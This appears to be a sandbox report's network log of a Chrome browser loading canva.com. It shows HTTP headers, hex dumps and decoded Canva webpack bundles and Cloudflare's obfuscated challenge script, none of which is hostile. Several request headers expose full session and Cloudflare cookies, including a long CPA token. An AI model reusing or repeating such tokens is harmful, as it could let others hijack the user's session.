                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:43 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 12870
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59511fad355e65-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49983
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "20e9ff75aa3527cfd46175deaf4d946c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:29 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: XHqQVxSrcNDiOb2C4WxzRG7xnF/hENxVEFNsR6JvrBFWfbkXlWOxeFVXQElzRaFX36QAB82tCRI=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8RGEEV0S6DVTQ9
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: sneblVlWanPyHNVn8bPKBaE74YPSj_9U
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 47 51 6a 53 63 5a 64 32 4c 63 57 69 46 6f 51 65 30 58 73 68 47 34 25 32 46 30 43 56 25 32 46 6b 66 37 52 25 32 46 46 68 54 6f 65 44 52 6f 53 42 76 4a 7a 34 6a 47 5a 74 63 41 42 71 53 66 46 4e 62 63 34 74 54 70 71 4f 6c 57 69 70 32 73 31 51 74 58 33 75 4a 36 63 61 6f 58 75 52 51 59 31 6d 49 45 69 49 53 48 64 71 71 6c 67 52 64 50 6c 54 79 45 30 37 49 68 35 73 30 4b 79 45 4e 50 42 39 59 52 63 58 57 4d 61 6d 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQjScZd2LcWiFoQe0XshG4%2F0CV%2Fkf7R%2FFhToeDRoSBvJz4jGZtcABqSfFNbc4tTpqOlWip2s1QtX3uJ6caoXuRQY1mIEiISHdqqlgRdPlTyE07Ih5s0KyENPB9YRcXWMamw%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1198INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 36 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 31 33 39 35 30 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5069],{/***/ 139504:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 68 72 6f 77 20 6e 65 77 20 42 28 61 29 3b 7d 7d 3b 0a 48 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 24 69 2e 6d 61 70 28 46 72 61 28 61 29 2c 63 3d 3e 63 3f 22 6c 69 22 3d 3d 3d 62 26 26 61 6a 28 63 29 26 26 22 6c 69 22 3d 3d 3d 63 2e 74 79 70 65 3f 47 72 61 28 63 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 62 6a 28 63 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 2c 22 65 41 55 69 48 41 22 29 7d 29 3a 64 6a 28 62 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 65 41 55 69 48 41 22 2c 63 68 69 6c 64 72 65 6e 3a 63 7d 29 3a 6e 75 6c 6c 29 7d 3b 0a 46 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 3d 30 2c 63 3d 5b 5d 29 7b 61 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 2e 6d 61 70 28 64 3d 3e 7b 76 61 72 20 65 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                    Data Ascii: hrow new B(a);}};Hra=function(a,b){return $i.map(Fra(a),c=>c?"li"===b&&aj(c)&&"li"===c.type?Gra(c,{className:bj(c.props.className,"eAUiHA")}):dj(b,{className:"eAUiHA",children:c}):null)};Fra=function(a,b=0,c=[]){a=Array.isArray(a)?a.map(d=>{var e;return
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6e 74 65 72 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 4d 59 62 36 30 41 22 2c 73 74 61 72 74 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 54 6a 62 4d 42 67 22 2c 73 74 61 72 74 46 6c 65 78 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 5f 57 49 79 56 51 22 2c 65 6e 64 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 51 38 5f 7a 39 51 22 2c 65 6e 64 46 6c 65 78 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 59 67 48 44 6e 67 22 2c 73 70 61 63 65 42 65 74 77 65 65 6e 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 5f 31 6c 56 73 69 41 22 2c 73 74 72 65 74 63 68 41 6c 69 67 6e 49 74 65 6d 73 3a 22 58 4a 4b 70 48 67 22 2c 63 65 6e 74 65 72 41 6c 69 67 6e 49 74 65 6d 73 3a 22 46 51 36 34 67 67 22 2c 73 74 61 72 74 41 6c 69 67 6e 49 74 65 6d 73 3a 22
                                                                                                                                                                                                                                                                    Data Ascii: nterJustifyContent:"MYb60A",startJustifyContent:"TjbMBg",startFlexJustifyContent:"_WIyVQ",endJustifyContent:"Q8_z9Q",endFlexJustifyContent:"YgHDng",spaceBetweenJustifyContent:"_1lVsiA",stretchAlignItems:"XJKpHg",centerAlignItems:"FQ64gg",startAlignItems:"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 72 79 3a 22 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 3a 22 76 61 72 28 2d 2d 32 33 5a 4f 56 51 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 46 6f 72 65 3a 22 76 61 72 28 2d 2d 35 75 45 53 4d 67 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 46 6f 72 65 4c 6f 77 3a 22 76 61 72 28 2d 2d 4f 51 32 67 70 41 29 22 2c 63 6f 6c 6f 72 57 61 72 6e 4c 6f 77 3a 22 76 61 72 28 2d 2d 79 64 5a 55 53 41 29 22 2c 63 61 6e 76 61 73 42 61 63 6b 67 72 6f 75 6e 64 3a 22 69 31 4b 77 7a 67 22 2c 0a 74 61 62 64 6f 63 6b 42 61 63 6b 67 72 6f 75 6e 64 3a 22 7a 50 50 4c 36 67 22 2c 70 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 3a 22 4c 67 55 72 31 51 22 2c 73 75 72 66 61 63 65 42 61 63 6b 67 72 6f 75 6e 64 3a 22 45 53 47 63 56 77 22 2c 63 6f 6e 74 72 61 73 74 42 61 63 6b 67
                                                                                                                                                                                                                                                                    Data Ascii: ry:"var(--VNXpSw)",colorWarn:"var(--23ZOVQ)",colorWarnFore:"var(--5uESMg)",colorWarnForeLow:"var(--OQ2gpA)",colorWarnLow:"var(--ydZUSA)",canvasBackground:"i1Kwzg",tabdockBackground:"zPPL6g",pageBackground:"LgUr1Q",surfaceBackground:"ESGcVw",contrastBackg
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6f 70 3a 22 70 43 5f 49 56 77 22 2c 73 74 61 6e 64 61 72 64 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 58 51 4b 47 55 77 22 2c 63 72 69 74 69 63 61 6c 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 6d 32 46 54 78 41 22 2c 6c 6f 77 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 72 39 6d 35 51 41 22 2c 6e 6f 6e 65 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 71 54 78 75 56 41 22 2c 73 74 61 6e 64 61 72 64 42 6f 72 64 65 72 53 74 61 72 74 3a 22 5f 34 55 39 4b 65 51 22 2c 63 72 69 74 69 63 61 6c 42 6f 72 64 65 72 53 74 61 72 74 3a 22 73 4d 30 57 7a 77 22 2c 6c 6f 77 42 6f 72 64 65 72 53 74 61 72 74 3a 22 6d 45 66 55 6e 51 22 2c 6e 6f 6e 65 42 6f 72 64 65 72 53 74 61 72 74 3a 22 52 4d 33 5f 6b 51 22 2c 73 74 61 6e 64 61 72 64 42 6f 72 64 65 72 45 6e 64 3a 22 5f 39 34 70 74
                                                                                                                                                                                                                                                                    Data Ascii: op:"pC_IVw",standardBorderBottom:"XQKGUw",criticalBorderBottom:"m2FTxA",lowBorderBottom:"r9m5QA",noneBorderBottom:"qTxuVA",standardBorderStart:"_4U9KeQ",criticalBorderStart:"sM0Wzw",lowBorderStart:"mEfUnQ",noneBorderStart:"RM3_kQ",standardBorderEnd:"_94pt
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 2e 2e 66 7d 3d 61 3b 61 3d 66 2e 64 69 73 70 6c 61 79 3b 63 6f 6e 73 74 20 67 3d 66 2e 70 61 64 64 69 6e 67 2c 68 3d 66 2e 79 45 2c 6b 3d 66 2e 57 58 2c 6c 3d 66 2e 70 61 64 64 69 6e 67 54 6f 70 2c 6d 3d 66 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 2c 6e 3d 66 2e 6f 36 2c 70 3d 66 2e 76 7a 61 2c 71 3d 66 2e 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3b 76 61 72 20 72 3d 66 2e 66 6c 65 78 57 72 61 70 2c 75 3d 66 2e 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3b 63 6f 6e 73 74 20 76 3d 66 2e 61 6c 69 67 6e 49 74 65 6d 73 2c 78 3d 66 2e 52 49 62 2c 79 3d 66 2e 53 49 62 3b 76 61 72 20 7a 3d 28 7a 3d 66 2e 62 61 63 6b 67 72 6f 75 6e 64 29 3f 4f 72 61 5b 60 24 7b 7a 7d 42 61 63 6b 67 72 6f 75 6e 64 60 5d 3a 6e 75 6c 6c 3b 76 61 72 20 43 3d 28 43 3d 66 2e 62 6f 72 64
                                                                                                                                                                                                                                                                    Data Ascii: ..f}=a;a=f.display;const g=f.padding,h=f.yE,k=f.WX,l=f.paddingTop,m=f.paddingBottom,n=f.o6,p=f.vza,q=f.flexDirection;var r=f.flexWrap,u=f.justifyContent;const v=f.alignItems,x=f.RIb,y=f.SIb;var z=(z=f.background)?Ora[`${z}Background`]:null;var C=(C=f.bord
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 5d 3a 5a 69 5b 60 24 7b 75 7d 46 6c 65 78 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 60 5d 3a 6e 75 6c 6c 2c 76 3f 22 66 6c 65 78 22 21 3d 3d 61 7c 7c 22 73 74 61 72 74 22 21 3d 3d 76 26 26 22 65 6e 64 22 21 3d 3d 76 3f 5a 69 5b 60 24 7b 76 7d 41 6c 69 67 6e 49 74 65 6d 73 60 5d 3a 0a 5a 69 5b 60 24 7b 76 7d 46 6c 65 78 41 6c 69 67 6e 49 74 65 6d 73 60 5d 3a 6e 75 6c 6c 2c 42 72 61 28 22 66 6c 65 78 22 2c 78 29 2c 42 72 61 28 22 67 72 69 64 22 2c 79 29 29 3b 61 3d 7b 2e 2e 2e 28 61 26 26 58 69 28 51 72 61 2c 61 29 29 2c 2e 2e 2e 28 67 26 26 58 69 28 52 72 61 2c 67 2c 66 6a 29 29 2c 2e 2e 2e 28 68 26 26 58 69 28 53 72 61 2c 68 2c 66 6a 29 29 2c 2e 2e 2e 28 6b 26 26 58 69 28 54 72 61 2c 6b 2c 66 6a 29 29 2c 2e 2e 2e 28 6c 26 26 58 69 28 55 72 61 2c 6c 2c 66
                                                                                                                                                                                                                                                                    Data Ascii: ]:Zi[`${u}FlexJustifyContent`]:null,v?"flex"!==a||"start"!==v&&"end"!==v?Zi[`${v}AlignItems`]:Zi[`${v}FlexAlignItems`]:null,Bra("flex",x),Bra("grid",y));a={...(a&&Xi(Qra,a)),...(g&&Xi(Rra,g,fj)),...(h&&Xi(Sra,h,fj)),...(k&&Xi(Tra,k,fj)),...(l&&Xi(Ura,l,f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6a 3d 68 6a 28 28 7b 77 69 64 74 68 3a 61 3d 22 66 6c 75 69 64 22 2c 63 68 69 6c 64 72 65 6e 3a 62 2c 74 61 67 4e 61 6d 65 3a 63 3d 22 64 69 76 22 2c 72 6f 6c 65 3a 64 7d 2c 65 29 3d 3e 64 6a 28 63 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 62 6a 28 22 61 44 63 36 59 67 22 2c 44 72 61 28 61 29 29 2c 73 74 79 6c 65 3a 43 72 61 28 61 29 3f 7b 22 2d 2d 4a 36 73 6f 52 41 22 3a 61 7d 3a 6e 75 6c 6c 2c 72 6f 6c 65 3a 64 2c 72 65 66 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 62 7d 29 29 3b 67 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 50 6d 4b 30 4d 41 22 2c 63 67 3a 22 2d 2d 46 47 31 48 69 51 22 2c 42 67 3a 22 2d 2d 5a 44 6b 5f 51 51 22 2c 7a 67 3a 22 2d 2d 75 51 77 4e 63 77 22 7d 3b 68 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 5a 5f 4d 69 71 67 22 2c 63 67 3a 22 2d 2d
                                                                                                                                                                                                                                                                    Data Ascii: j=hj(({width:a="fluid",children:b,tagName:c="div",role:d},e)=>dj(c,{className:bj("aDc6Yg",Dra(a)),style:Cra(a)?{"--J6soRA":a}:null,role:d,ref:e,children:b}));gsa={default:"--PmK0MA",cg:"--FG1HiQ",Bg:"--ZDk_QQ",zg:"--uQwNcw"};hsa={default:"--Z_Miqg",cg:"--
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6f 32 56 67 22 2c 42 67 3a 22 2d 2d 65 38 74 45 30 41 22 2c 7a 67 3a 22 2d 2d 4e 51 48 47 73 67 22 7d 3b 72 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 53 38 77 69 49 41 22 2c 63 67 3a 22 2d 2d 6c 39 61 72 32 51 22 2c 42 67 3a 22 2d 2d 43 63 42 68 32 67 22 2c 7a 67 3a 22 2d 2d 74 4b 65 57 71 51 22 7d 3b 73 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 50 73 45 61 75 77 22 2c 63 67 3a 22 2d 2d 33 6c 31 52 45 51 22 2c 42 67 3a 22 2d 2d 67 4c 66 65 44 41 22 2c 7a 67 3a 22 2d 2d 75 46 69 69 34 51 22 7d 3b 74 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 51 72 62 4a 55 41 22 2c 63 67 3a 22 2d 2d 30 2d 57 2d 68 77 22 2c 42 67 3a 22 2d 2d 5a 52 6d 70 44 41 22 2c 7a 67 3a 22 2d 2d 64 51 53 5f 64 41 22 7d 3b 75 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 74 46 78
                                                                                                                                                                                                                                                                    Data Ascii: o2Vg",Bg:"--e8tE0A",zg:"--NQHGsg"};rsa={default:"--S8wiIA",cg:"--l9ar2Q",Bg:"--CcBh2g",zg:"--tKeWqQ"};ssa={default:"--PsEauw",cg:"--3l1REQ",Bg:"--gLfeDA",zg:"--uFii4Q"};tsa={default:"--QrbJUA",cg:"--0-W-hw",Bg:"--ZRmpDA",zg:"--dQS_dA"};usa={default:"--tFx


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    67192.168.2.1249791104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1401OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js? HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC718INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:43 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                    Content-Length: 8147
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLO6d0zSqTgXVxW%2Fv1T%2BFYjsgpUDWRAAwy5fBiuIcyidEwJQVB7wELmnVeJH8k9TzIxlvNl8oBQO4Z5aJD1Be23k4NFX8rBLZ3UKU8rBXLD8LmDAlHC1V98mL9ZkJPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e5951209d1f8cab-EWR
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC651INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 78 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 55 2c 66 2c 67 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 70 61 72 73 65 49 6e 74 28 55 28 35 31 32 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 38 30 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 55 28 35 32 30 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 35 35 31 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 55 28 34 37 37 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 55 28 34 39 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 55 28 35 36 39 29 29 2f 37 2a 28 2d 70 61 72
                                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(512))/1+-parseInt(U(480))/2+parseInt(U(520))/3*(-parseInt(U(551))/4)+parseInt(U(477))/5*(parseInt(U(491))/6)+parseInt(U(569))/7*(-par
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 29 5d 26 26 28 48 3d 48 5b 61 30 28 34 37 32 29 5d 28 67 5b 61 30 28 35 35 32 29 5d 5b 61 30 28 34 38 33 29 5d 28 44 29 29 29 2c 48 3d 67 5b 61 30 28 35 30 30 29 5d 5b 61 30 28 35 35 34 29 5d 26 26 67 5b 61 30 28 35 34 34 29 5d 3f 67 5b 61 30 28 35 30 30 29 5d 5b 61 30 28 35 35 34 29 5d 28 6e 65 77 20 67 5b 28 61 30 28 35 34 34 29 29 5d 28 48 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c 61 31 2c 4f 29 7b 66 6f 72 28 61 31 3d 61 30 2c 4e 5b 61 31 28 34 39 32 29 5d 28 29 2c 4f 3d 30 3b 4f 3c 4e 5b 61 31 28 34 37 33 29 5d 3b 4e 5b 4f 2b 31 5d 3d 3d 3d 4e 5b 4f 5d 3f 4e 5b 61 31 28 34 37 36 29 5d 28 4f 2b 31 2c 31 29 3a 4f 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4e 7d 28 48 29 2c 49 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 49 3d 49 5b 61 30
                                                                                                                                                                                                                                                                    Data Ascii: )]&&(H=H[a0(472)](g[a0(552)][a0(483)](D))),H=g[a0(500)][a0(554)]&&g[a0(544)]?g[a0(500)][a0(554)](new g[(a0(544))](H)):function(N,a1,O){for(a1=a0,N[a1(492)](),O=0;O<N[a1(473)];N[O+1]===N[O]?N[a1(476)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 35 33 36 29 5d 28 30 29 2c 47 3d 30 3b 38 3e 47 3b 4f 3d 4f 3c 3c 31 2e 31 36 7c 54 26 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 35 30 37 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 2e 35 36 7c 54 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 35 30 37 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 35 33 36 29 5d 28 30 29 2c 47 3d 30 3b 31 36 3e 47 3b 4f 3d 4f 3c 3c 31 2e 33 36 7c 54 26 31 2e 35 32 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 36 28 35 30 37 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a
                                                                                                                                                                                                                                                                    Data Ascii: +);for(T=J[a6(536)](0),G=0;8>G;O=O<<1.16|T&1,P==E-1?(P=0,N[a6(507)](F(O)),O=0):P++,T>>=1,G++);}else{for(T=1,G=0;G<M;O=O<<1.56|T,P==E-1?(P=0,N[a6(507)](F(O)),O=0):P++,T=0,G++);for(T=J[a6(536)](0),G=0;16>G;O=O<<1.36|T&1.52,E-1==P?(P=0,N[a6(507)](F(O)),O=0):
